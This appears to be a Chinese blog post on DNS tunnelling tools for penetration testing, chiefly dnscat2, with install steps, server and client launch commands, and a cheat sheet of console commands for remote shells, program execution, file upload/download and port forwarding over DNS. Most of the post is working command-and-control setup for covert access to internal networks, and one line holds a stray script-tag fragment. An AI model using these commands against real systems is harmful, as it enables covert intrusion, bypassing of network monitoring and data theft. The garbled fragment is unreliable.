DNS隧道工具

2021年12月24日

iodine

https://github.com/yarrick/iodine



dnscat2

Type:dns解析类型 A CNAME MX TXT

分为直链模式和中继模式

gem install ecdsa
gem install salsa20
gem install sha3
gem install trollop

https://rubygems.org/gems

powershell版本

https://github.com/lukebaggett/dnscat2-powershell

git安装

服务端
git clone https://github.com/iagox86/dnscat2.git
cd  dnscat2
cd server
sudo gem install bundler
bundle install <script src=" 
客户端
git clone https://github.com/iagox86/dnscat2.git
cd  dnscat2/client/
make
make nocrypto     禁用客户端加密
启动的三个方式
sudo ruby./dnscat2.rb demo.com --secret=123456
sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=553,type=TXT --secret=123456
sudo ruby./dnscat2.rb demo.com --secret=123456 --security=open --no-cache
demo为自定义域名  -secret 自定义链接密码
server&port 表示监听本机的533端口
--security 规定了安全级别   --no-cache  禁止缓存
set security=open    动态改变是否加密
客户端执行
dnscat --secret=123456 demo.com
dnscat --dns server=<server ip>,port=553,type=TXT   填写ip的情况下表示不走dns服务商 -t 使用的dns类型
链接成功客户端会提示  Session established!
服务端控制台输入 windows 即可看到一个客户端上线
1 :: command (DESKTOP-001)....
1表示客户端ID windows -i 1  可进入控制台
shell 半交互的shell
quit 退出控制台
kill 1 中断通道
set security=open 设定值
windos 列举出所有通道
window -i 2 链接通道2
session -i 1
clear 清屏
delay 修改远程会话超时时间
exec  执行远程机上的程序
download/upload 两端之间上传下载文件
supend  返回上一层

command seesion (debian) 1> listen 127.0.0.1:8080 10.0.0.20:80




https://blog.csdn.net/localhost01/article/details/86591685



分类:技术文章 | 标签: linuxwindowsdns渗透神器内网 | 查看:339
windows自带的PSR实现监控桌面反弹shell管理工具

发表评论: